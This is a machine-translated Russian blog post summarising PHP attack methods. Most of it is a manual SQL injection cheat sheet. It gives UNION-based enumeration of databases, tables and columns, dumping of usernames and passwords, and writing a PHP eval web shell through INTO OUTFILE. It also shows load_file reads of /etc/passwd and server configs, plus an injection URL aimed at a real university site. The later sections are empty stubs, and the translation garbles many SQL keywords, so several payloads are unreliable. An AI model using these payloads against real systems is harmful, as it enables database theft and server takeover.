Рубрики
Uncategorized

Краткое описание нескольких распространенных методов атаки в PHP

Автор оригинала: David Wong.

В этой статье кратко излагается несколько распространенных методов атаки PHP. Чтобы поделиться с вами для вашей справки, следующим образом:

1. SQL-инъекция

① . порядок по номерам/*

② . поле соответствия и объединение выберите 1,2,3,4,5 .n/*

③ . положение поля экспозиции и объединение выберите 1,2,3,4,5 ..N/*

④ . использование встроенной функции для предоставления информации о базе данных

версия() база данных() пользователь()

Нет необходимости угадывать доступные поля для раскрытия информации о базе данных (некоторые веб-сайты неприменимы).:

и объединить все выбранные версии()/*

и объединить все выбранные базы данных()/*

и объединить всех выбранных пользователей()/*

Информация об операционной системе:

и объедините все, выберите @@global.version_compile_os из mysql.user/*

Права доступа к базе данных:

И ord (mid (пользователь(),/* возвращает обычное описание как root

Моб (MySQL > 5.0)

Над MySQL 5 имеется встроенная библиотека information_schema, в которой хранится вся информация о структуре базы данных и таблиц MySQL. И объединение выберите 1,2,3, schema_name, 5,6,7,8,9,10 из information_schema. Ограничение схемы 0,1

Таблица для угадывания

И объединение выберите 1,2,3, имя таблицы, 5,6,7,8,9,10 из информационной схемы. Таблицы, в которых таблица ﹣ (ШЕСТНАДЦАТЕРИЧНОЕ) ограничение 0 (начальная запись, 0-первая начальная запись), 1 (показать 1 запись) –

Поле догадок

И объединение выберите 1,2,3, имя столбца, 5,6,7,8,9,10 в схеме информационного меню. Столбцы, в которых имя таблицы (ШЕСТНАДЦАТЕРИЧНОЕ) ограничено 0,1

Штормовой пароль

И объединение выберите 1,2,3, сегмент имени пользователя, 5,6,7, сегмент пароля, 8,9 из ограничения имени таблицы 0,1

Расширенное использование (одно доступное поле отображает два содержимого данных): объединение выберите 1,2,3 конкат (сегмент имени пользователя, 0x3c, сегмент пароля), 5,6,7,8,9 из ограничения имени таблицы 0,1

Белая лошадь напрямую (разрешение root)

Условия:

① , знать физический путь к сайту

② , имеют достаточные разрешения (вы можете использовать Select . из mysql. Пользовательский тест)

③ 、magic_quotes_gpc()=ВЫКЛ.

Выберите ‘< PHP Eval ($_post [CMD])? >’ в outfile ‘физический путь’ и объединить все выделенные шестнадцатеричные значения одного предложения в outfile ‘путь’

Загрузить файл() общий путь:

1、замените(load_file(0×2F6574632F706173737764),0×3c,0×20) 2、замените(load_file(символ(47,101,116,99,47,112,97,115,115,119,100)),символ(60),символ(32)) Два вышеуказанных параметра предназначены для проверки кода, полностью отображаемого в файле PHP. Иногда, если вы не замените некоторые символы, например, “заменить” < на “пробел”, будет возвращена веб-страница. Вы не можете просмотреть код 3. Файл загрузки (символ (47)) может содержать список корневого каталога системы FreeBSD, SunOS 4./etc TPD/conf tpd.conf или/usr/local/Apache/conf tpd.conf просмотр файла конфигурации виртуального хоста Linux Apache 5. C: \ program files \ Группа Apache \ Apache \ conf \ httpd.conf или C: \ Apache \ conf \ httpd.conf просмотр файла Apache в системе Windows 6. C:/resin-3.0.14/conf/resin.conf просмотр информации о конфигурации файла resin на веб-сайте, разработанной JSP 7. C:/resin/conf/resin.conf/usr/локальный/resin/conf/resin.conf просмотр виртуального хоста JSP, настроенного системой Linux 8、d:\APACHE\Apache2\conf\httpd.conf 9、C:\Program Файлы\mysql\my.ini 10../

Проблемы при ручном впрыске:

После инъекции на странице отобразится:

Незаконное сочетание параметров сортировки (latin1_swedish_ci,НЕЯВНО) и (utf8_general_ci,НЕЯВНО) для операции “ОБЪЕДИНЕНИЕ”

Такие как: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file(0x433A5C626F6F742E696E69),3,4,user()%20

Это связано с несогласованным кодированием,

Решение: добавьте перед параметром Unhex (шестнадцатеричный (параметр)) Просто отлично. Приведенный выше URL-адрес может быть изменен на:

Решение: добавьте перед параметром || Unhex (шестнадцатеричный (параметр)) || Просто отлично. Приведенный выше URL-адрес может быть изменен на:

Теперь мы можем продолжать вводить…

2. XSS (межсайтовый сценарий)

//www.jb51.net/article/160334.htm

3. Раскрытие исходного кода

Вы можете использовать php.ini или htaccess для управления


   Order allow,deny
   Deny from all


4. Удаленное включение файлов



” if(file_exists(‘/home/wwwrun’ . $file . ‘.php’)){xxx} ?>

5. Захват сеанса

6. Подделка Межсайтового Запроса

7. Обход каталогов

Для получения дополнительной информации о PHP вы можете ознакомиться со следующими разделами: Учебник по безопасности программирования PHP, краткое описание навыков фильтрации безопасности PHP, краткое описание операций и использования операторов PHP, учебник по основному синтаксису PHP, учебник по объектно-ориентированному программированию PHP, краткое описание использования строк PHP, руководство по работе с базой данных PHP + MySQL 》И краткое описание общих навыков работы с базой данных PHP

Я надеюсь, что эта статья будет полезна для программирования на PHP.